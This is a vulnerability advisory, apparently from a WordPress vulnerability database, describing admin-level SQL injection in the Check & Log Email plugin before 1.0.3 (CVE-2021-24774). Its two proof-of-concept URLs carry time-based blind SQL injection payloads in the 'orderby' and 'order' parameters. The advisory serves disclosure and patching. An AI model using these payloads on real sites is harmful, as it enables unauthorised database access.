Lucene search
Anton SarsadskikhWPEX-ID:F80EF09A-D3E2-4D62-8532-F0EBE59AE110HistorySep 27, 2021 - 12:00 a.m.
Check & Log Email < 1.0.3 - Admin+ SQL Injections
2021-09-2700:00:00
Anton Sarsadskikh
425
email security
log settings
sql injection
plugin vulnerability
admin panel.
EPSS
0.001
Percentile
37.2%
The plugin does not validate and escape the “order” and “orderby” GET parameters before using them in a SQL statement when viewing logs, leading to SQL injections issues
With the 'Enable Log' settings (of the plugin) activated:
- https://example.com/wp-admin/admin.php?page=check-email-logs&orderby=sent_date+AND+(SELECT+4702+FROM (SELECT(SLEEP(5)))xwDN)&order=DESC
- https://example.com/wp-admin/admin.php?page=check-email-logs&orderby=sent_date&order=+AND+(SELECT+4702+FROM (SELECT(SLEEP(5)))xwDN)Related
cve
cve
CVE-2021-24774
2021-10-25 14:15:10
nvd
nvd
CVE-2021-24774
2021-10-25 14:15:10
prion
prion
Sql injection
2021-10-25 14:15:00
wpvulndb
wpvulndb
Check & Log Email < 1.0.3 - Admin+ SQL Injections
2021-09-27 00:00:00
cvelist
cvelist
CVE-2021-24774 Check & Log Email < 1.0.3 - Admin+ SQL Injections
2021-10-25 13:20:54